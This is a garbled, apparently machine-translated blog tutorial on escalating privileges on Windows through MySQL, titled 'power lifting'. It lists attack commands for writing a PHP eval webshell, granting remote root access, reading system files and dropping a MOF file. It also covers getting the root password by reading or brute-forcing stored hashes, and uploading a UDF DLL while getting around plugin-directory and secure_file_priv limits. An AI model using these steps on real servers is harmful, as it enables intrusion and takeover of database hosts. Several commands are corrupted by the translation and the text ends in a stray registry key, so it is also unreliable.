windows power lifting series (2)

Posted by lipsius at 2020-04-01

The content of this article is mainly about the use of database services to carry out the right operation. Today's main content is to use MySQL and MSSQL to carry out the right operation.

Using Mysql to raise rights

Before using MySQL for power lifting, first review the common commands of MySQL:

Search path: [email protected] @ basedir as basepath from dual

Select * from mysql.user

Register function: Create function shell returns string soname 'UDF. DLL'

Check version: select version();

Export: select load file (0x633a5c626f6f742e696e69) from user into outfile 'd://a.txt'

Write file: select '< PHP Eval ($_post [CMD]);? >' into outfile 'f://a.php';

External connection: grant all privileges on. To 'root' @ '%' identified by '123456' with grant option;

Read file: select load file ('c: \ boot. Ini ')

Move file: select load_file ('c: / wmpub / nullevt. MOF ') into dumpfile' C: / Windows / system32 / WBEM / MOF / nullevt. MOF '

Find root password

All three ways of using Mysql to get the account password of root, the highest authority of MySQL database. So let's first discuss how to obtain the root password of MySQL:

1. Turn the configuration file. Keywords: config conn data SQL Inc database, etc

2. Download the data file and crack the ciphertext.

The root password is stored in the MySQL database storage directory / mysq / user.myd, which can be read with the following command under low permission, or directly use the "MySQL low permission read root password tool" of dark moon, and then use cmd5 to decrypt.

3. Violent cracking. Use a blasting tool similar to [Phoenix scanner] (

Using UDF to raise rights

UDF is a user-defined function, which supports user-defined functions. The custom function here should be written as a MySQL plug-in in the form of DLL and provided to MySQL for use. That is to say, we can realize the functions we need by writing DLL files. For UDF writing, please refer to ( It is necessary to know the password of the root account and the target system is windows. You can use the off the shelf UDF power lifting tool. Here is the manual test method.

1. View MySQL version

select version();#-->5.7.14

2. Upload DLL file

DLL files can be uploaded by webshell or exported by mysql. The suffix is not necessarily DLL, it can be arbitrary. 64 bit and 32-bit versions correspond to different DLL files. If 32-bit DLLs are used to register in 64 bit system, an error will be prompted: can't open shared library 'UDF. DLL' (errno: 193)

Can't open shared library 'udf.dll' (errno: 193 )

In MySQL before 4.1, any function in all DLL files can be registered in MySQL for MySQL to call. No matter where the DLL is, what the function declaration looks like.

In MySQL 4.1 and later versions, UDF functions are limited. Only functions with a specific interface can be successfully registered in mysql, which prevents illegal calls to system DLLs through mysql.

After mysql5.0, there are restrictions on the location of registered DLLs. When creating functions, the corresponding DLLs cannot contain / or \. A simple understanding is that they cannot be absolute paths. So we will upload the DLL to the directory contained in the path environment variable to skip the restriction (run echo% path% to see the writable directory, for example: C: \ windows \ udf.dll or C: \ windows \ system32 \ UDF. DLL), or put it in the root directory of the drive letter to skip the restriction by writing in the form of C: udf.dll.

echo %path%

For mysql5.1 and above, you must upload the DLL file to the Lib \ plugin folder under the MySQL installation directory to create a custom function. By default, the 'plugin' folder does not exist, which may be to prevent the DLL from being written to this folder through the into dumpfile. You can use the command show variables like '% plugin%' to see if the plugin folder exists. You can manually create lib and plugin folders in webshell, or you can use NTFS ads stream to create folders as follows (5.7.14 insufficient permissions, errCode: 13 - permission denied. 5.5.8 yes. Which versions are OK? ):

show variables like '%plugin%' Errcode: 13 - Permission denied

If the MySQL server turns on the secure file priv option, the file can only be exported to the specified directory. You can query the value of secure file priv by showing variables like '% secure%'. Use ා to comment out the line "secure_file_priv =" C: / wamp64 / tmp "in my.ini or mysql.cnf under the MySQL installation directory, and then restart Mysql to export the file to any directory. (to be solved: do Apache users have permission to change this configuration file and restart MySQL? )

show variables like '%secure%'; secure_file_priv="c:/wamp64/tmp" HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon